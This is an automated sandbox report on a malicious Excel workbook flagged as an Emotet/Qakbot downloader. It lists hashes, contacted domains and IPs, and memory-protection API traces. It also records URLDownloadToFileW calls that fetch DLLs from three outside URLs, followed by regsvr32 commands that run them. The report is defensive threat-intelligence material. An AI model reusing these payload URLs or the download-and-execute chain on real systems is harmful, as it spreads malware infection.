popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

W-160957625.xlsb

Malicious Library Excel Binary Workbook file format(xlsb) ZIP Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 March 24, 2025, 9:31 p.m. March 24, 2025, 9:33 p.m.
Size 1.0MB
Type Microsoft Excel 2007+
MD5 fdf2f291fa7b70ebea93d238db8aae1f
SHA256 c4a26d3389fd11c4bbc4a1771d88869d28eca8f19c802a7aa2b070bb6ea18378
CRC32 E1FC7FF7
ssdeep 24576:a9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:25KA65VSrX5KAV5KAVNFK
Yara
  • zip_file_format - ZIP file format
  • Malicious_Library_Zero - Malicious_Library
  • xlsb - Excel Binary Workbook file format detection

Name Response Post-Analysis Lookup
natalespatagonia.cl
camarajocaclaudino.pb.gov.br
A 162.241.62.76
162.241.62.76
maramaabroo.com
A 185.151.30.185
185.151.30.185
IP Address Status Action
162.241.62.76 Active Moloch
164.124.101.2 Active Moloch
185.151.30.185 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f5b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f60f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f60f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f551000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76161000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75e61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f4a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f481000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x730d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f441000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f3f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f3b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x091a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Uduw\ehxw2.dll
file C:\Uduw\ehxw1.dll
file C:\Uduw\ehxw3.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000328
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000410
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000041c
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 C:\Uduw\ehxw2.dll
cmdline regsvr32 C:\Uduw\ehxw1.dll
cmdline regsvr32 C:\Uduw\ehxw3.dll
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw1.dll
filepath: C:\Uduw\ehxw1.dll
2148270085 0

URLDownloadToFileW

 url: https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw2.dll
filepath: C:\Uduw\ehxw2.dll
2148270085 0

URLDownloadToFileW

 url: https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw3.dll
filepath: C:\Uduw\ehxw3.dll
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw2.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw1.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw3.dll
Lionic Trojan.Script.Generic.4!c
ClamAV Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0
CAT-QuickHeal XML.Downloader.46545.GC
McAfee X97M/Downloader.oy
VIPRE Trojan.Agent.FVAR
Sangfor Malware.Generic-XLM.Save.Emotet_ma35
BitDefender Trojan.Agent.FVAR
Arcabit Trojan.Agent.FVAR [many]
Cyren XF/Agent.BF.gen!Eldorado
Symantec Scr.MalMacro!gen3
ESET-NOD32 multiple detections
Avast VBS:Malware-gen
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.Generic
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
MicroWorld-eScan Trojan.Agent.FVAR
Rising Trojan.Generic/XLM@AI.100 (RDM.XLM:UUeJZLoxW8Y1ZgarvdkS2A)
Emsisoft Trojan-Downloader.Macro.Generic.DG (A)
F-Secure Malware.W97M/Dldr.Quakbot.JS
DrWeb X97M.DownLoader.974
TrendMicro Possible_SMXFQAKBOTYXCDH1
McAfee-GW-Edition X97M/Downloader.oy
FireEye Trojan.Agent.FVAR
Sophos Troj/DocDl-AFYL
Ikarus Trojan-Downloader.O97M.Qakbot
Avira W97M/Dldr.Quakbot.JS
Microsoft TrojanDownloader:O97M/Qakbot.IQAY!MTB
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Macro.Trojan-Downloader.Agent.BDH
Google Detected
Tencent Trojan.MsOffice.Macro40.11020301
Fortinet MSExcel/Agent.AC!tr.dldr
AVG VBS:Malware-gen